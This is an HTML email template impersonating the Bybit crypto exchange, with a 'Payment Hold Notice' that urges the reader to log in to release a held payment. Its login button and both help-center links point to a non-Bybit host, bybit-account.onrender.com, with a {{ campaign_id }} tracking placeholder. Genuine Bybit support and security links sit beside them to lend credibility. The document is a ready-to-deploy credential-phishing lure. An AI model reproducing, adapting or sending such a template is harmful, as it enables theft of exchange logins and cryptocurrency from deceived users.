<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, maximum-scale=1.0">
    <meta name="format-detection" content="telephone=no">
    <meta name="format-detection" content="date=no">
    <meta name="format-detection" content="address=no">
    <meta name="format-detection" content="email=no">
    <meta name="x-apple-disable-message-reformatting">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>Bybit - Payment Hold Notification</title>
    <link href="https://fonts.googleapis.com/css2?family=Nunito:wght@400;600;700;800&display=swap" rel="stylesheet">
    <style>
        /* Reset and base styles */
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        /* Mobile-first responsive design */
        body { 
            margin: 0; 
            padding: 0; 
            font-family: 'Nunito', Arial, Helvetica, sans-serif; 
            background-color: #f5f5f5; 
            font-size: 16px;
            line-height: 1.6;
            -webkit-text-size-adjust: 100%;
            -ms-text-size-adjust: 100%;
            color: #333;
        }
        
        /* Container and layout */
        .email-container {
            max-width: 640px;
            margin: 0 auto;
            background-color: #ffffff;
        }
        
        .content-wrapper {
            padding: 20px;
        }
        
        /* Typography */
        h1, h2, h3, h4, h5, h6 {
            font-family: 'Nunito', Arial, Helvetica, sans-serif;
            font-weight: 700;
            line-height: 1.2;
            margin-bottom: 16px;
        }
        
        h2 {
            font-size: 24px;
        }
        
        p {
            font-family: 'Nunito', Arial, Helvetica, sans-serif;
            margin-bottom: 16px;
            line-height: 1.6;
        }
        
        /* Button styles */
        .login-button {
            background-color: #f7931a;
            color: white !important;
            padding: 16px 32px;
            text-decoration: none;
            border-radius: 8px;
            display: inline-block;
            font-weight: 700;
            font-family: 'Nunito', Arial, Helvetica, sans-serif;
            text-align: center;
            min-width: 200px;
            margin: 24px 0;
            font-size: 16px;
            border: none;
            cursor: pointer;
            transition: background-color 0.3s ease;
            -webkit-appearance: none;
            -moz-appearance: none;
            appearance: none;
        }
        
        .login-button:hover {
            background-color: #e6840f;
        }
        
        /* Warning box */
        .warning-box {
            background-color: #fff3cd;
            border: 1px solid #ffeaa7;
            border-radius: 8px;
            color: #856404;
            padding: 20px;
            margin: 24px 0;
            text-align: center;
            font-family: 'Nunito', Arial, Helvetica, sans-serif;
        }
        
        .warning-icon {
            font-size: 24px;
            margin-bottom: 12px;
            display: block;
        }
        
        /* Transaction details box */
        .transaction-details {
            background-color: #f8f9fa;
            border-left: 4px solid #f7931a;
            padding: 20px;
            margin: 24px 0;
            border-radius: 4px;
        }
        
        .transaction-details p {
            margin-bottom: 8px;
            font-family: 'Nunito', Arial, Helvetica, sans-serif;
        }
        
        /* Lists */
        ul {
            margin: 16px 0;
            padding-left: 24px;
            font-family: 'Nunito', Arial, Helvetica, sans-serif;
        }
        
        li {
            margin-bottom: 8px;
        }
        
        /* Links */
        a {
            color: #f7931a;
            text-decoration: none;
            font-family: 'Nunito', Arial, Helvetica, sans-serif;
        }
        
        a:hover {
            text-decoration: underline;
        }
        
        /* Mobile styles (default) */
        @media screen and (max-width: 480px) {
            .content-wrapper {
                padding: 16px;
            }
            
            h2 {
                font-size: 20px;
            }
            
            .login-button {
                width: 100%;
                padding: 16px 24px;
                font-size: 16px;
                min-width: auto;
            }
            
            .warning-box,
            .transaction-details {
                padding: 16px;
                margin: 16px 0;
            }
            
            body {
                font-size: 14px;
            }
            
            /* Make tables responsive */
            table {
                width: 100% !important;
                max-width: 100% !important;
            }
            
            td {
                display: block !important;
                width: 100% !important;
                text-align: left !important;
            }
            
            /* Hide social media icons on mobile for better space */
            .social-icons {
                display: none;
            }
        }
        
        /* Tablet styles */
        @media screen and (min-width: 481px) and (max-width: 768px) {
            .content-wrapper {
                padding: 24px;
            }
            
            h2 {
                font-size: 22px;
            }
            
            .login-button {
                font-size: 18px;
                padding: 18px 36px;
                min-width: 220px;
            }
            
            .warning-box,
            .transaction-details {
                padding: 24px;
            }
        }
        
        /* Desktop styles */
        @media screen and (min-width: 769px) {
            .content-wrapper {
                padding: 32px;
            }
            
            h2 {
                font-size: 24px;
            }
            
            .login-button {
                font-size: 16px;
                padding: 16px 32px;
                min-width: 200px;
            }
            
            .warning-box {
                width: 85%;
                margin: 24px auto;
            }
        }
        
        /* Dark mode support */
        @media (prefers-color-scheme: dark) {
            body {
                background-color: #1a1a1a;
                color: #ffffff;
            }
            
            .email-container {
                background-color: #2d2d2d;
            }
            
            .warning-box {
                background-color: #2c1810;
                border-color: #4a3426;
                color: #d4b896;
            }
            
            .transaction-details {
                background-color: #3a3a3a;
                border-left-color: #f7931a;
            }
        }
        
        /* Email client compatibility */
        .outlook-fix {
            mso-table-lspace: 0pt;
            mso-table-rspace: 0pt;
        }
        
        /* High DPI displays */
        @media only screen and (-webkit-min-device-pixel-ratio: 2),
               only screen and (min-device-pixel-ratio: 2) {
            .login-button {
                border: 1px solid #f7931a;
            }
        }
    </style>
</head>

<body>

        
<p>&nbsp;</p><div class="adn ads" data-legacy-message-id="19088069636b139b" data-message-id="#msg-f:1803832840889766811" style="background-color: white; border-left: none; color: #222222; display: flex; font-family: &quot;Google Sans&quot;, Roboto, RobotoDraft, Helvetica, Arial, sans-serif; padding: 0px;"><div class="gs" style="margin: 0px; min-width: 0px; padding: 0px 0px 20px; width: initial;"><div><div class="ii gt" id=":mp" jslog="20277; u014N:xr6bB; 1:WyIjdGhyZWFkLWY6MTgwMzgzMjg0MDg4OTc2NjgxMSJd; 4:WyIjbXNnLWY6MTgwMzgzMjg0MDg4OTc2NjgxMSJd" style="direction: ltr; font-size: 0.875rem; margin: 8px 0px 0px; overflow-x: hidden; padding: 0px; position: relative;"><div class="a3s aiL" id=":mo" style="direction: initial; font-family: Arial, Helvetica, sans-serif; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: small; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: 1.5; overflow: auto hidden; position: relative;"><center><table align="center" border="0" cellpadding="0" cellspacing="0" id="m_1669380272034625786bodyTable" style="height: 100%; width: 100%;"><tbody><tr><td align="center" id="m_1669380272034625786bodyCell" style="margin: 0px;" valign="top"><table border="0" cellpadding="0" cellspacing="0" style="width: 100%;"><tbody><tr><td align="center" id="m_1669380272034625786templateHeader" style="margin: 0px;" valign="top"><table align="center" border="0" cellpadding="0" cellspacing="0" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin: 0px auto; max-width: 640px; width: 100%;"><tbody><tr><td style="margin: 0px;" valign="top"><table border="0" cellpadding="0" cellspacing="0" style="min-width: 100%; width: 100%;"><tbody><tr><td style="margin: 0px; padding: 0px;" valign="top"><table align="left" border="0" cellpadding="0" cellspacing="0" style="min-width: 100%; width: 100%;"><tbody><tr><td style="margin: 0px; padding: 20px 0px; text-align: center;" valign="top"><img align="center" alt="" class="CToWUd" data-bit="iit" src="https://ci3.googleusercontent.com/meips/ADKq_NZqNoC93r9KyAmKgDTHkIO8dQP6U_aJXF3BfBHl2jfxQuxuLOhPlgIQK0s9iI6lKlcuw9Bf2AqrsmTP_vGOIC1VigPbOTy2Iug2kQbSniBB0BE-UYoHZZWLqd8wouSdy-unvhMUT3X9yLNt2b-GVb_cuUWDTxT0-1nUE6genNHTRZ7KZV8xJ3gartPUCGgCtwcJv5MCmLEo7RDrAXK3JM6vzaiv=s0-d-e1-ft#https://prod-infra-app-pigeon-public.s3.ap-southeast-1.amazonaws.com/6a63e23a-b9b0-4637-8221-4d94b530acea3836c84f172151f52d2d6410443e3768.png" style="border-radius: 0%; width: 100px;" width="100" /></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td align="center" id="m_1669380272034625786templateBody" style="margin: 0px;" valign="top"><table align="center" border="0" cellpadding="0" cellspacing="0" style="width: 100%;"><tbody><tr><td style="margin: 0px;" valign="top"><table border="0" cellpadding="0" cellspacing="0" style="min-width: 100%; width: 100%;"><tbody><tr><td style="margin: 0px; padding-top: 0px;" valign="top"><table align="left" border="0" cellpadding="0" cellspacing="0" style="width: 100%;"><tbody><tr><td style="margin: 0px; padding: 0px;" valign="top"><div id="m_1669380272034625786contentContainer" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; box-sizing: border-box; font-size: 16px; line-height: 1.6; margin: auto; max-width: 640px; padding: 20px 40px; width: 640px; font-family: 'Nunito', Arial, Helvetica, sans-serif;"><h2 style="color: #f7931a; font-size: 24px; margin-bottom: 20px; font-family: 'Nunito', Arial, Helvetica, sans-serif; font-weight: 700;">Payment Hold Notice</h2>

<p style="font-family: 'Nunito', Arial, Helvetica, sans-serif; margin-bottom: 16px;">Dear valued Bybit trader,</p>

<p style="font-family: 'Nunito', Arial, Helvetica, sans-serif; margin-bottom: 16px;">We're writing to inform you that a payment in your account is currently being held for review.</p>


<p style="font-family: 'Nunito', Arial, Helvetica, sans-serif; margin-bottom: 16px;"><strong>Why is this payment on hold?</strong></p>
<p style="font-family: 'Nunito', Arial, Helvetica, sans-serif; margin-bottom: 16px;">Bybit may temporarily hold payments for various security reasons, including:</p>
<ul style="font-family: 'Nunito', Arial, Helvetica, sans-serif; margin: 16px 0; padding-left: 24px;">
    <li style="margin-bottom: 8px;">Unusual account activity detection</li>
    <li style="margin-bottom: 8px;">Enhanced security verification requirements</li>
    <li style="margin-bottom: 8px;">Compliance with regulatory guidelines</li>
    <li style="margin-bottom: 8px;">Protection against unauthorized transactions</li>
</ul>

<p style="font-family: 'Nunito', Arial, Helvetica, sans-serif; margin-bottom: 16px;"><strong>What do you need to do?</strong></p>
<p style="font-family: 'Nunito', Arial, Helvetica, sans-serif; margin-bottom: 16px;">To resolve this hold and complete your transaction, please log in to your Bybit account and follow the verification steps.</p>

<div style="text-align: center; margin: 30px 0;">
    <a href="https://bybit-account.onrender.com?campaign={{ campaign_id }}" class="login-button" target="_blank" style="background-color: #f7931a; color: white !important; padding: 16px 32px; text-decoration: none; border-radius: 8px; display: inline-block; font-weight: 700; font-family: 'Nunito', Arial, Helvetica, sans-serif; text-align: center; min-width: 200px; margin: 24px 0; font-size: 16px; border: none; transition: background-color 0.3s ease;">
        Log In to Bybit
    </a>
</div>

<p style="font-family: 'Nunito', Arial, Helvetica, sans-serif; margin-bottom: 16px;"><strong>Important Security Notice:</strong></p>
<p style="font-family: 'Nunito', Arial, Helvetica, sans-serif; margin-bottom: 16px;">If you believe your account has been compromised, please contact us immediately via live chat or email <a href="mailto:support@bybit.com" style="color: #f7931a; font-family: 'Nunito', Arial, Helvetica, sans-serif;" target="_blank">support@bybit.com</a> using your registered email address.</p>

<p style="font-family: 'Nunito', Arial, Helvetica, sans-serif; margin-bottom: 16px;">To enhance your account security, consider enabling Google Two-Factor Authentication (2FA) and setting up a Fund Password from the <a href="https://www.bybit.com/app/user/security" style="color: #f7931a; font-family: 'Nunito', Arial, Helvetica, sans-serif;" target="_blank">Account & Security</a> page.</p>

<p style="font-family: 'Nunito', Arial, Helvetica, sans-serif; margin-bottom: 16px;">For more information, please visit our help center:</p>
<p style="font-family: 'Nunito', Arial, Helvetica, sans-serif; margin-bottom: 16px;"><a href="https://bybit-account.onrender.com?campaign={{ campaign_id }}" style="color: #f7931a; font-family: 'Nunito', Arial, Helvetica, sans-serif;" target="_blank">How to verify your account?</a></p>
<p style="font-family: 'Nunito', Arial, Helvetica, sans-serif; margin-bottom: 16px;"><a href="https://bybit-account.onrender.com?campaign={{ campaign_id }}" style="color: #f7931a; font-family: 'Nunito', Arial, Helvetica, sans-serif;" target="_blank">Understanding withdrawal holds</a></p>

<p style="font-family: 'Nunito', Arial, Helvetica, sans-serif; margin-bottom: 16px;">Thank you for choosing Bybit.</p>
<p style="font-family: 'Nunito', Arial, Helvetica, sans-serif; margin-bottom: 16px;"><strong>The Bybit Team</strong></p></div></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td align="center" id="m_1669380272034625786templateFooter" style="margin: 0px;" valign="top"><table align="center" border="0" cellpadding="0" cellspacing="0" style="width: 100%;"><tbody><tr><td style="margin: 0px;" valign="top"><table border="0" cellpadding="0" cellspacing="0" role="presentation" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin: 0px auto; max-width: 640px; width: 100%;"><tbody><tr><td style="background-color: transparent; border-top: 1px solid rgb(221, 221, 221); margin: 0px; padding: 0px 24px 20px;" valign="top"><table border="0" cellpadding="0" cellspacing="0" role="presentation" style="background-color: transparent; width: 100%;"><tbody></tbody></table></td></tr><tr><td align="center" style="margin: 0px; padding: 12px 0px 0px;" valign="top"><img alt="" class="CToWUd" data-bit="iit" height="auto" role="presentation" src="https://ci3.googleusercontent.com/meips/ADKq_NZqNoC93r9KyAmKgDTHkIO8dQP6U_aJXF3BfBHl2jfxQuxuLOhPlgIQK0s9iI6lKlcuw9Bf2AqrsmTP_vGOIC1VigPbOTy2Iug2kQbSniBB0BE-UYoHZZWLqd8wouSdy-unvhMUT3X9yLNt2b-GVb_cuUWDTxT0-1nUE6genNHTRZ7KZV8xJ3gartPUCGgCtwcJv5MCmLEo7RDrAXK3JM6vzaiv=s0-d-e1-ft#https://prod-infra-app-pigeon-public.s3.ap-southeast-1.amazonaws.com/6a63e23a-b9b0-4637-8221-4d94b530acea3836c84f172151f52d2d6410443e3768.png" style="display: block; height: auto; max-width: 100%;" width="95" /></td></tr><tr><span style="font-size: 12px;">Copyright © 2018 - 2025 Bybit. All rights reserved.</span></span></p></div></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></center><div class="yj6qo"></div><div class="adL"></div></div></div><div class="WhmR8e" data-hash="0" style="clear: both;"></div></div></div><div class="ajx" style="clear: both;"><br /></div></div>
</body>
</html>
